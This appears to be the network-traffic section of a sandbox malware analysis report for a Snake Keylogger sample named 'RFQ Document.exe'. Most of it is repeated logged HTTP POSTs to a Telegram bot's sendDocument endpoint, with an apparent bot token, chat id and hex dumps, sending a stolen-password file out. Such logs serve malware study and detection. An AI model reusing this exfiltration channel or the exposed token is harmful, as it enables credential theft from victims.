                                            Data Ascii: {"ok":true,"result":{"message_id":12933,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808808,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            349192.168.2.450186149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:08 UTC552OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fda345bf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:08 UTC553OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 61 33 34 35 62 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fda345bfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:09 UTC553INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:09 UTC554INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12934,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            35192.168.2.449811149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:27 UTC55OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c61c73f5
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:27 UTC56OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 31 63 37 33 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c61c73f5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:27 UTC56INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:27 GMT
                                            Content-Type: application/json
                                            Content-Length: 523
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:27 UTC56INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12616,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808707,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            350192.168.2.450187149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:09 UTC554OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fdc4a9cf
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:09 UTC554OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 63 34 61 39 63 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fdc4a9cfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:09 UTC555INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:09 UTC555INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12935,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            351192.168.2.450188149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:09 UTC556OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fde869e7
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:09 UTC556OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 64 65 38 36 39 65 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fde869e7Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:09 UTC556INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:09 UTC557INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12936,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            352192.168.2.450189149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 06:00:09 UTC557OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255fe135406
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 06:00:09 UTC558OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 66 65 31 33 35 34 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255fe135406Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 06:00:09 UTC558INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 06:00:09 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 06:00:09 UTC558INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 39 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 38 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12937,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808809,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            36192.168.2.449812149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:28 UTC57OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c6a4595f
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:28 UTC57OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 61 34 35 39 35 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c6a4595fContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:28 UTC58INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:28 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:28 UTC58INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 38 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12617,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808708,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            37192.168.2.449813149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:29 UTC59OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c6c35844
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:58:29 UTC59OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 36 63 33 35 38 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255c6c35844Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:58:29 UTC59INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:58:29 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:58:29 UTC60INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 39 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12618,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808709,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            38192.168.2.449814149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:29 UTC60OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c6e97fa6
                                            Host: api.telegram.org
                                            Content-Length: 407
